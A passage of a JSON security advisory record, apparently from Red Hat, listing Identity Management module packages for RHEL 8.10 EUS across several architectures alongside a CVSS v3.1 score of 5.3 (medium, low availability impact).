"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
